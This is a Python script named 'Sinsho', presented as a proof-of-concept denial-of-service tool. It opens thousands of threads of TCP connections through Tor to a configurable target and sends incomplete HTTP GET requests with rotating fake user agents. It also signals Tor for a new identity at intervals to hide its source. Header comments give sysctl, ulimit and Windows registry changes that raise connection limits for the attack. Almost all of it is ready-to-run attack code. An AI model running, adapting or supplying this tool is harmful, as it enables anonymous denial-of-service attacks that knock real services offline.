Sinsho is a proof of concept denial of service software that takes advantage of vulnerabilities in the TCP/IP Protocol. It is a proof of concept software able to create many connections in a Timed Wait/Half Open state.
### In order to use this script you will need to adjust values for ### max open file descriptors on your operating system ### How this is done is dependant on your operating system ### Debian ### ### sysctl -w fs.file-max=1000000 ### ### ulimit -n 100000 ### ### /proc/sys/net/ipv4/ ### tcp_retries1, tcp_retries2 ### sysctl -w net.ipv4.tcp_retries1=1 ### sysctl -w net.ipv4.tcp_retries2=1 ### sysctl -w net.ipv4.tcp_fin_timeout=1 # HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TCPIP\Parameters # TcpTimedWaitDelay - 300 # TcpMaxDataRetransmissions - 1 # TcpMaxConnectRetransmissions - 1 # InitialRttData - 65535 # Windows 7 SP1 - File Handle Quota # HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\ # USERProcessHandleQuota - 100000 import os, sys import socket import socks import struct import time import random from threading import * import errno ##### GLOBALS ##### ##### CHANGE THESE VALUE ##### target = "127.0.0.1" # Will not work against loopback - change this port = 14569 connections = 200 # Connections per thread threads = 100000 # Open File Descriptors/Sockets torChange = 300 # Time between Tor IP Change in seconds torPort = 9050 torControlPort = 9051 # Type in terminal "tor ControlPort 9051" ################## ### This is the thread sleep time ### Or iteration time between creating new threads timeout = 1.0 # Edit if needed ################## useragents = [ "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)", "Googlebot/2.1 (http://www.googlebot.com/bot.html)", "Opera/9.20 (Windows NT 6.0; U; en)", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)", "Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0", "Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16", "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)", # maybe not "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)", "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)", "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)" ] def log(message): print(message) def newIdentity(): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1) sock.settimeout(None) sock.connect(("127.0.0.1", torControlPort)) while True: try: sock.send('AUTHENTICATE \"\"\r\nSIGNAL NEWNYM\r\n') log("Tor Auth: success!") log("New identity requested") sock.recv(1024) log("Reply: from Tor") except socket.error, e: if isinstance(e.args, tuple): if e[0] == errno.EPIPE: log("Broken Pipe: socket error %s" % e) else: # determine and handle different error log("Socket error %s" % e) pass else: #log("Socket error %s" % e) pass time.sleep(torChange) return sock def initTorCon(target, port): sock = socks.socksocket() sock.setproxy(socks.PROXY_TYPE_SOCKS5, addr="127.0.0.1", port=torPort) sock.settimeout(None) sock.connect((target, port)) return sock def sinsho(): socks = {} while True: for i in range(connections): socks[i] = initTorCon(target, port) data = "GET / HTTP/1.1\r\n" data += "Host: %s\r\n" % (target) data += "User-Agent: %s" % (random.choice(useragents)) socks[i].send(data, socket.MSG_OOB | socket.MSG_DONTROUTE) log("[+] Packet data sent") def main(): thread_array = [] log("[+] Initiating Sinsho") log("[+] Target: %s" % target) log("[+] Port: %s" % port) log("[+] Starting Single Tor Thread") thread = Thread(target = newIdentity) thread.start() for i in range(threads): thread = Thread(target = sinsho) thread.start() thread_array.append(thread) time.sleep(timeout) for thread in thread_array: thread.join() time.sleep(torChange) if __name__ == '__main__': main()